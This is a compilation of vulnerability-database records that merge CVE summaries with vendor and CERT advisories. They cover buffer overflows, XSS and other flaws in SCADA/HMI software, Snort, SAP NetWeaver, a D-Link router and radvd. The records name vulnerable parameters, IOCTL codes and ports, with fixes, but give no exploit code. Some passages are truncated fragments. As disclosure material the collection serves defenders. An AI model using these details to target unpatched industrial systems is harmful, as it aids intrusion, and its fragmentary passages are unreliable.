var-201105-0156 Multiple buffer overflows in the ISSymbol ActiveX control in ISSymbol.ocx 61.6.0.0 and 301.1009.2904.0 in the ISSymbol virtual machine, as distributed in Advantech Studio 6.1 SP6 61.6.01.05, InduSoft Web Studio before 7.0+SP1, and InduSoft Thin Client 7.0, allow remote attackers to execute arbitrary code via a long (1) InternationalOrder, (2) InternationalSeparator, or (3) LogFileName property value; or (4) a long bstrFileName argument to the OpenScreen method. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Indusoft Thin Client. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within ISSymbol.ocx ActiveX component. When an overly large string is passed as the 'InternationalOrder' parameter, a heap overflow occurs. This vulnerability can be leveraged to execute code under the context of the user running the browser. InduSoft Web Studio is a powerful and complete graphics control software that includes the various functional modules required to develop Human Machine Interface (HMI), Management Control, Data Acquisition System (SCADA) and embedded control. The Advantech Studio ISSymbol ActiveX control has a boundary error in the handling of the "InternationalSeparator" property. The Advantech Studio ISSymbol ActiveX control is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. Failed exploit attempts will likely result in denial-of-service conditions. Advantech Studio 6.1 SP6 Build 61.6.01.05 is vulnerable; other versions may also be affected. There are multiple buffer overflow vulnerabilities in InduSoft ISSymbol ActiveX control 6.1 SP6 Build 61.6.01.05 (ISSymbol.ocx 61.6.0.0) and other versions.
ZDI-12-155 : InduSoft Thin Client ISSymbol InternationalOrder Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-155 August 22, 2012 -- CVE ID: CVE-2011-0340 -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P -- Affected Vendors: Indusoft -- Affected Products: Indusoft WebStudio -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12505. -- Vendor Response: Indusoft has issued an update to correct this vulnerability. More details can be found at: http://www.indusoft.com/hotfixes/hotfixes.php -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-08-22 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Alexander Gavrun -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
var-200702-0378 Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic. Snort IDS and Sourcefire Intrusion Sensor are prone to a stack-based buffer-overflow vulnerability because the network intrusion detection (NID) systems fail to handle specially crafted 'DCE' and 'RPC' network packets. An attacker can exploit this issue to execute malicious code in the context of the user running the affected application. Failed attempts will likely cause these applications to crash. The software provides functions such as packet sniffing, packet analysis, and packet inspection. National Cyber Alert System Technical Cyber Security Alert TA07-050A Sourcefire Snort DCE/RPC Preprocessor Buffer Overflow Original release date: February 19, 2007 Last revised: -- Source: US-CERT Systems Affected * Snort 2.6.1, 2.6.1.1, and 2.6.1.2 * Snort 2.7.0 beta 1 * Sourcefire Intrusion Sensors version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 * Sourcefire Intrusion Sensors for Crossbeam version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 Other products that use Snort or Snort components may be affected. I. The DCE/RPC preprocessor reassembles fragmented SMB and DCE/RPC traffic before passing data to the Snort rules. The vulnerable code does not properly reassemble certain types of SMB and DCE/RPC packets. An attacker could exploit this vulnerability by sending a specially crafted TCP packet to a host or network monitored by Snort. The DCE/RPC preprocessor is enabled by default, and it is not necessary for an attacker to complete a TCP handshake. US-CERT is tracking this vulnerability as VU#196240. This vulnerability has been assigned CVE number CVE-2006-5276. Further information is available in advisories from Sourcefire and ISS. II. III.
Solution Upgrade Snort 2.6.1.3 is available from the Snort download site. Sourcefire customers should visit the Sourcefire Support Login site. Disable the DCE/RPC Preprocessor To disable the DCE/RPC preprocessor, comment out the line that loads the preprocessor in the Snort configuration file (typically /etc/snort.conf on UNIX and Linux systems): [/etc/snort.conf] ... #preprocessor dcerpc... Restart Snort for the change to take effect. Disabling the preprocessor will prevent Snort from reassembling fragmented SMB and DCE/RPC packets. This may allow attacks to evade the IDS. IV. References * US-CERT Vulnerability Note VU#196240 - <http://www.kb.cert.org/vuls/id/196240> * Sourcefire Advisory 2007-02-19 - <http://www.snort.org/docs/advisory-2007-02-19.html> * Sourcefire Support Login - <https://support.sourcefire.com/> * Sourcefire Snort Release Notes for 2.6.1.3 - <http://www.snort.org/docs/release_notes/release_notes_2613.txt> * Snort downloads - <http://www.snort.org/dl/> * DCE/RPC Preprocessor - <http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html> * IBM Internet Security Systems Protection Advisory - <http://iss.net/threats/257.html> * CVE-2006-5276 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA07-050A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA07-050A Feedback VU#196240" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. 
Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 19, 2007: Initial Release . February 19, 2007 Summary: Sourcefire has learned of a remotely exploitable vulnerability in the Snort DCE/RPC preprocessor. Sourcefire has prepared updates for Snort open-source software to address this issue. Mitigating Factors: Users who have disabled the DCE/RPC preprocessor are not vulnerable. Recommended Actions: * Open-source Snort 2.6.1.x users are advised to upgrade to Snort 2.6.1.3 (or later) immediately. * Open-source Snort 2.7 beta users are advised to mitigate this issue by disabling the DCE/RPC preprocessor. This issue will be resolved in Snort 2.7 beta 2. Workarounds: Snort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should reenable the DCE/RPC preprocessor. Detecting Attacks Against This Vulnerability: Sourcefire will be releasing a rule pack that provides detection for attacks against this vulnerability. Has Sourcefire received any reports that this vulnerability has been exploited? - No. Sourcefire has not received any reports that this vulnerability has been exploited.
Acknowledgments: Sourcefire would like to thank Neel Mehta from IBM X-Force for reporting this issue and working with us to resolve it. . Resolution ========== All Snort users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/snort-2.6.1.3" References ========== [ 1 ] CVE-2006-5276 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-201112-0297 Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user's browser when viewed maliciously. When using transaction "sa38", RSTXSCRP reports an error and can be exploited to inject any UNC path through the "File Name" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the "<STRING>" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions
var-201407-0233 Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the webdact.ocx ActiveX Control. The control does not check the length of an attacker-supplied ProjectName string before copying it into a fixed length buffer on the stack. This could allow an attacker to execute arbitrary code in the context of the browser process. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. The Advantech WebAccess webvact.ocx, dvs.ocx and webdact.ocx ActiveX controls fail to properly handle overly long ProjectName, SetParameter, NodeName, CCDParameter, SetColor, AlarmImage, GetParameter, GetColor, ServerResponse, SetBaud and IPAddress parameters, and attackers can build a malicious web page that, when a user is enticed to access it, can crash an application or execute arbitrary code. Advantech WebAccess is prone to multiple remote stack-based buffer-overflow vulnerabilities. Failed exploit attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
var-201809-0087 WECON LeviStudio Versions 1.8.29 and 1.8.44 have multiple stack-based buffer overflow vulnerabilities that can be exploited when the application processes specially crafted project files. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Wecon LeviStudioU. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the UserMgr.xml file. When parsing the GroupList ID element, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code under the context of Administrator. WECON LeviStudio is a set of human interface programming software from WECON, China
var-202411-1458 Cross Site Scripting vulnerability in DLink DWR 2000M 5G CPE With Wifi 6 Ax1800 and Dlink DWR 5G CPE DWR-2000M_1.34ME allows a local attacker to obtain sensitive information via the file upload feature of the VPN configuration module. The dwr-2000m firmware from D-Link Systems, Inc. has a cross-site scripting vulnerability. Information may be obtained and information may be tampered with. D-Link DWR-2000M is a wireless router from D-Link, a Chinese company. D-Link DWR-2000M has a cross-site scripting vulnerability. The vulnerability is caused by the lack of effective filtering and escaping of user-provided data by the application
var-201109-0089 Multiple unspecified vulnerabilities in Cisco Unified Service Monitor before 8.6, as used in Unified Operations Manager before 8.6 and CiscoWorks LAN Management Solution 3.x and 4.x before 4.1; and multiple EMC Ionix products including Application Connectivity Monitor (Ionix ACM) 2.3 and earlier, Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) 3.2.0.2 and earlier, IP Management Suite (Ionix IP) 8.1.1.1 and earlier, and other Ionix products; allow remote attackers to execute arbitrary code via crafted packets to TCP port 9002, aka Bug IDs CSCtn42961 and CSCtn64922, related to a buffer overflow. Cisco Unified Service Monitor, as used in Cisco Unified Operations Manager and CiscoWorks LAN Management Solution, contains a vulnerability that allows arbitrary code execution. The problem is tracked as Bug IDs CSCtn42961 and CSCtn64922. A third party could execute arbitrary code via crafted packets to TCP port 9002. Authentication is not required to exploit this vulnerability. The flaw exists within the brstart.exe service which listens by default on TCP port 9002. When handling an add_dm request the process uses a user provided value to allocate a buffer then blindly copies user supplied data into a fixed-length buffer on the heap. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the casuser user. Multiple EMC Ionix applications are prone to a buffer-overflow vulnerability. Successful exploits will result in the complete compromise of affected applications. Failed exploit attempts will result in a denial-of-service condition. The following applications are affected.
Ionix Application Connectivity Monitor (Ionix ACM) version 2.3 and prior Ionix Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) version 3.2.0.2 and prior Ionix IP Management Suite (Ionix IP) version 8.1.1.1 and prior Ionix IPv6 Management Suite (Ionix IPv6) version 2.0.2 and prior Ionix MPLS Management Suite (Ionix MPLS) version 4.0.0 and prior Ionix Multicast Manager (Ionix MCAST) version 2.1 and prior Ionix Network Protocol Management Suite version (Ionix NPM) 3.1 and prior Ionix Optical Transport Management Suite version (Ionix OTM) 5.1 and prior Ionix Server Manager (EISM) version 3.0 and prior Ionix Service Assurance Management Suite (Ionix SAM) version 8.1.0.6 and prior Ionix Storage Insight for Availability Suite (Ionix SIA) version 2.3.1 and prior Ionix VoIP Availability Management Suite (Ionix VoIP AM) version 4.0.0.3 and prior. Details ======= CiscoWorks LAN Management Solution is an integrated suite of management functions that simplifies the configuration, administration, monitoring, and troubleshooting of a network. ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products. EMC will communicate the fixes for all other affected products as they become available. Regularly check EMC Knowledgebase solution emc274245 for the status of these fixes. Link to remedies: Registered EMC Powerlink customers can download software from Powerlink. For EMC Ionix Software, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads E-I Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045. Credits: EMC would like to thank Abdul Aziz Hariri working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue.
For explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important security information. EMC recommends all users determine the applicability of this information to their individual situations and take appropriate action. In no event shall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Cisco has released free software updates that address these vulnerabilities. There are no workarounds available to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml Note: CiscoWorks LAN Management Solution is also affected by these vulnerabilities. The Software Update page displays the licensing and software version. They provides a way to continuously monitor active calls supported by the Cisco Unified Communications System. Both of these vulnerabilities are documented in Cisco bug ID CSCtn42961 ( registered customers only) and have been assigned CVE ID CVE-2011-2738. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. 
Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCtn42961 - Cisco Unified Service Monitor Remote Code Execution CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-201100914-cusm-lms.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. 
Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. 
Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were reported to Cisco by ZDI and discovered by AbdulAziz Hariri. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. 
Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +----------------------------------------+ | Revision | | Initial | | 1.0 | 2011-September-14 | public | | | | release | +----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. 
+--------------------------------------------------------------------
var-201908-0863 Rockwell Automation Arena Simulation Software versions 16.00.00 and earlier contain a USE AFTER FREE CWE-416. A maliciously crafted Arena file opened by an unsuspecting user may result in the application crashing or the execution of arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of DOE files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. 9502-Ax) 16.00.00 and earlier versions have resource management error vulnerabilities
var-201402-0027 The process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to cause a denial of service (stack-based buffer over-read and crash) via unspecified vectors. radvd is prone to the following security vulnerabilities: 1. Multiple local privilege-escalation vulnerabilities. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A security vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu.
If used in unicast mode, a remote attacker could cause radvd outages, resulting in a denial of service. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 .
TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ RELEASE DATE: 2011-11-21 DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml .
Gentoo Linux Security Advisory GLSA 201111-08 http://security.gentoo.org/ Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 Synopsis: Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background: radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages: Package / Vulnerable / Unaffected: 1 net-misc/radvd / < 1.8.2 / >= 1.8.2 Description: Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround: There is no known workaround at this time. Resolution: All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References: [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability: This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml License: Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 .
Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org
var-201402-0028 The process_rs function in the router advertisement daemon (radvd) before 1.8.2, when UnicastOnly is enabled, allows remote attackers to cause a denial of service (temporary service hang) via a large number of ND_ROUTER_SOLICIT requests. radvd is prone to the following security vulnerabilities: 1. Multiple local privilege-escalation vulnerabilities. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. An input validation vulnerability exists in the 'process_rs' function in radvd 1.8.1 and earlier.
var-201402-0026 Buffer overflow in the process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a negative value in a label_len value. radvd is prone to the following security vulnerabilities: 1. Multiple local privilege-escalation vulnerabilities. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A buffer overflow vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier.
var-201803-1810 A Stack-based Buffer Overflow issue was discovered in Delta Electronics Delta Industrial Automation DOPSoft, Version 4.00.01 or prior. Stack-based buffer overflow vulnerabilities caused by processing specially crafted .dop or .dpb files may allow an attacker to remotely execute arbitrary code. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation DOPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of the BackgroundMacro structure in a DPA file. An attacker can leverage this vulnerability to execute code under the context of the current process
var-201810-0396 Advantech WebAccess 8.3.1 and earlier has several stack-based buffer overflow vulnerabilities that have been identified, which may allow an attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability. The specific flaw exists within bwclient.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess software is the core of Advantech's IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve a cross-platform and cross-browser data access experience. A stack buffer overflow vulnerability exists in Advantech WebAccess. Advantech WebAccess is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 3. An arbitrary-file-deletion vulnerability 4. This may aid in further attacks. Advantech WebAccess 8.3.1 and prior versions are vulnerable
var-201906-1029 In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2776 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
